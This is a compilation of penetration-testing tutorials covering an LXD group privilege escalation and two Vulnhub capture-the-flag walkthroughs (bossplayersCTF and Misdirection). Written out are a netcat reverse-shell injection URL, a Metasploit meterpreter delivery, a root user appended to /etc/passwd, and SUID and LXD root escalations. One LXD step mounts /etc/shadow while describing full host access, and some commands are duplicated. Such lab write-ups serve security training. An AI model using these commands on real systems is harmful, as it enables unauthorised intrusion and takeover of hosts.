Lxd Privilege Escalation

In this post we are going to describes how an account on the system that is member of the lxd group is able to escalate the root privilege by exploiting the features of LXD.

A member of the local `lxd` group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match privileges of the calling user. There are multiple methods to exploit this.

One of them is to use the LXD API to mount the host's root filesystem into a container which are going to use in this post. This gives a low-privilege user root access to the host filesystem. This is demonstrated in the exploit attached.

Table of content

·         Introduction to LXD and LXC

·         Container Technology

·         LXD Installation and Configuration

·         LXD Installation and Configuration

Introduction to LXD and LXC

Linux Container (LXC) are often considered as a lightweight virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel.

Linux daemon (LXD) is the lightervisor, or lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before. It uses the stable LXC API to do all the container management behind the scene, adding the REST API on top and providing a much simpler, more consistent user experience.

Caintainer Technology

Container technology cames from container, is a procedure to assemble an application so that it can be run, with its requirements, in isolation from other processesContainer applications with names like Docker and Apache Mesos ' popular choices have been introduced by major public cloud vendors including Amazon Web Services, Microsoft Azure and Google Cloud Platforms.

Requirement

Host machine : ubuntu 18:04

Attacker machine : Kali Linux or any other Machine

Let’s Begin !!

So here you can observe that we have a profile for user “raj” as a local user account on the host machine

LXD Installation and Configuration

Now install lxd by executing following command:

apt install lxd

Also, you need to install some dependency for lxd:

apt install zfsutils-linux

Now to add profile for user: raj into the lxd group, type following command:

usermod --append --groups lxd raj

So now you can observe user “raj” is part of lxd groups.

Now you can configure LXD and start the LXD initialization process with the lxd init command. During initialization it will ask for choosing some option, here majorly we have gone with DEFAULT options. But for the storage backend we have choose “dir” instead of zfs.

Once you have configured the lxd then you can create a container using lxc. Here we are creating a container for ubuntu:18.04 and named it “intimate-seasnail”. Further lxc list to view the available installed containers.

lxc launch ubuntu:18.04

intimate-seasnail

lxc list

Connect to the container with lxc exec command, which takes the name of the container and the commands to execute:

lxc exec intimate-seasnail -- /bin/bash

Once inside the container, your shell prompt will look like as following below.

Privilege Escalation

Privilege escalation through lxd requires the access of local account therefore we choose SSH to connect and take the access local account on host machine.

Note: the most important condition is that the use should be the member of lxd group.

In order to take escalate the root privilege of the host machine you have to create an image for lxd thus you need to perform following action:

1.       Steps to be perform on attacker machine:

·         Download build-alpine in your local machine through git repository.

·         Execute the script “build -alpine” that will build latest Alpine image as compressed file, this step must be executed by root user.

·         Transfer the tar file to the host machine

2.       Steps to be perform on host machine:

·         Download the alpine image

·         Import image for lxd

·         Initialize the image inside a new container.

·         Mount the container inside the /root directory

So, we downloaded the build alpine using the github repo.

git clone  https://github.com/saghul/lxd-alpine-builder

cd lxd-alpine-builder

./build-alpine

On running the above command, a tar.gz file is created in our working directory that we have transfer to the host machine.

python -m SimpleHTTPServer

On other hand we will download the alpine-image inside /tmp

wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz

After the image is built it can be added as an image to LXD as follows:

lxc image import ./ apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

use list command to check the list of images

lxc image list

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/etc/shadow path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

lxc start ignite

lxc exec ignite /bin/sh

id

Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it.

mnt/root/root

ls

flag.txt

cat flag.txt

Source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071

bossplayersCTF 1: Vulnhub Walkthrough

bossplayersCTF 1 VM is made by Cuong Nguyen. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

·        netdiscover

·        nmap port scan

Enumeration

·        Browsing HTTP Service

·        Performing Directory Bruteforce

·        Decoding Encoded Text

Exploiting

·        Command Injection

Privilege Escalation

·        SUID on find command

Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.1.107

We learned from the scan that we have the port 80 open which is hosting Rocket httpd service, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service. Here we have the description of the machine that tells us that this is an extremely easy CTF. It is for those who are getting started with the CTFs. It also tells us that there might be rabbit holes. So we will try to avoid those.

Now as convention, we checked the source code of the webpage in hope to get some valuable hint to move forward with our enumeration. Here, we got an encoded value. This might lead us somewhere.

But we wanted to further enumerate with a directory bruteforce. To do this we will use the dirb. With this directory bruteforce scan, we got a robots.txt file. On browsing it on our web browser we see that we have another encoded text titled as super-secret password. We decoded it to find a troll message “lol try harder bro”. This might be the rabbit hole mentioned earlier. 

drib http://192.168.1.107/

We went back to the commented encoded text we found earlier in the Source code of the webpage. It seemed like Base64, so we tried to decode it using base64 command. It gave back another encoded text. This also seemed like Base64, so we decoded it again. This gave back another encoded text. This is getting real tiring. Now we decoded it again to find workinginprogress.php. Not this seems important. All those decoding was not gone for waste.

echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" | base64 -d

ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K

echo "ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K" | base64 -d

d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==

echo "d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==" | base64 -d

We tried to open this file on our Web Browser as shown in the image given below. It was a check list of some kind. It showed that Linux Debian is installed, Apache2 is installed and PHP is also installed. But the stuff that’s not completed is test the ping command and fix the privilege escalation. These seems like major hints.  

http://192.168.1.107/workinginprogress.php

As it said test the ping command, it got use thinking that this might in fact be command injection. To further inspect this suspicion, we tried to run the id command through the URL as shown in the image given below. This made our suspicion true. This in fact is Command Injection.  

http://192.168.1.107/workinginprogress.php?cmd=id

To exploit command injection, we will be using the netcat invoke shell one liner. Before running that we need a netcat listener to receive the shell that is going to be invoked.

nc -lvp 1234

After running the listener, we went back to our browser, and here instead of the id command that we ran previously, it was time to run the shell invocation command. Here we invoked bin/bash shell to the IP Address 192.168.1.105 [Kali Linux]. With the port that we started the listener with.

http://192.168.1.107/workinginprogress.php?cmd=nc -e /bin/bash 192.168.1.105 1234

Now, we went back to our terminal, where we ran the netcat listener. We see that we have successfully got a session. But the shell that came with the session is an improper one. So in order to convert in into a proper shell, we ran the python one liner. This gave us a proper shell. As soon as we got this shell, we saw that the session that we got is of user www-data. This means that this is an unprivileged shell. We will have to work out way to that elevated privilege shell. For this we start to enumerate the target machine through the shell we got.

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@bossplayers:/var/www/html$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/find

As a part of our enumeration procedure, we ran the find command with -perm parameter to search for any file having SUID permissions. The find command itself has this permission. This made out job a little easy.

We ran the find command and tried to invoke the /bin/sh shell using it as shown in the image given below. This gave back us a root shell. We confirmed this is a root shell by running the id command.

www-data@bossplayers:/var/www/html$ find . -exec /bin/sh -p \; -quit

# id

# cd /root

# ls

# cat root.txt

Now we wanted to enumerate for the Root Flag. We went into the home directory of the root user. Here we found the file named root.txt. On opening it we got a base64 encoded text. It said “congratulations”. This concludes this CTF Challenge.

NOTE: Here we ran typed the command as simply we enter. The shell however just prints what we type again with it. So it gave the look as shown in the image.

Misdirection 1: Vulnhub Walkthrough

Misdirection 1 VM is made by FalconSpy. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

·        netdiscover

·        nmap port scan

Enumeration

·        Browsing HTTP Service

·        Performing Directory Bruteforce

Exploiting

·        Command Injection

Privilege Escalation

·        Writable etc/passwd File

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.1.106

We learned from the scan that we have the port 80 open which is hosting Rocket httpd service, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine. We also have 3306 which hints us to a database situation. Also, we have the Apache httpd running on the port 8080.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service. We have a webpage with some links here. We did some poking around but we figured out that the lab’s name is not a random name. It wants us to be misdirected. So, this is definitely a rabbit hole.

Back to out nmap port scan, we saw that the Apache httpd service is running on port 8080. So, we thought there might be something worthwhile there. But it is just the Apache It works page. Another Misdirection.

http://192.168.1.106:8080

For now, let’s try Directory Bruteforce using dirb. This surprisingly gave us pages with the name debug, shell and wordpress. All of these seems interesting.

dirb http://192.168.1.106:8080/

We soon figured out that wordpress was also another misdirection. This lab is full of rabbit holes. Now we found the debug page. On further inspection we see that there is a virtual shell running on this page. This could possibly our way in.

Now that we have a working virtual shell, let’s try to get a real shell using our good old friend Metasploit. We used the web_delivery exploit with the php reverse_tcp payload.

msf5 > use exploit/multi/script/web_delivery

msf5 exploit (multi/script/web_delivery) > set target 1

msf5 exploit (multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp

msf5 exploit (multi/script/web_delivery) > set lhost 192.168.1.105

msf5 exploit (multi/script/web_delivery) > exploit

This gave us a beautiful PHP script that we could use to exploit the target machine.

Now back to our virtual shell in our browser. We pasted the PHP code that Metasploit generated. We executed this script on this shell. This should give us a meterpreter shell. We went back on out Metasploit terminal to check.

And Of course, we have the meterpreter shell. This exploit mostly works in situation similar to this. We interacted with the meterpreter session using the sessions command. Then after getting onto the meterpreter we used the “shell” command to get a shell on the target system. This came back to be an improper shell. Now we got to use our python one liner to invoke a proper shell on the target machine. After getting the shell we saw that the shell we got is of user “www-data”. This means the story is not yet over. We have to work our way around to get an elevated privilege shell on the target machine. To escalate privilege, first we got to enumerate the rights of this user. We did that using the “sudo -l” command.

msf5 exploit (multi/script/web_delivery) > sessions 1

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@misdirection:/var/www/html/debug$ sudo -l

www-data@misdirection:/var/www/html/debug$ sudo -u brexit /bin/bash

brexit@misdirection:/var/www/html/debug$

Here we observed that it shows that user www-data has sudo rights to login as user named brexit without any password. Now using the sudo -u command we invoked a shell of user brexit.  

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is in fact writable as the user brexit. This is our way to move forward.

brexit@misdirection:~$ ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now all we got to do is run su command with the user name we just created and enter the password and root shell.

brexit@misdirection:~$ echo 'raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash' >>/etc/passwd

brexit@misdirection:~$ tail /etc/passwd

brexit@misdirection:~$ su raj

pass123

root@misdirection:/home/brexit# cd /root

root@misdirection:~# ls

root@misdirection:~# cat root.txt

Now that we got the root shell, let’s enumerate further for the root flag. We found one in the home directory of the root user.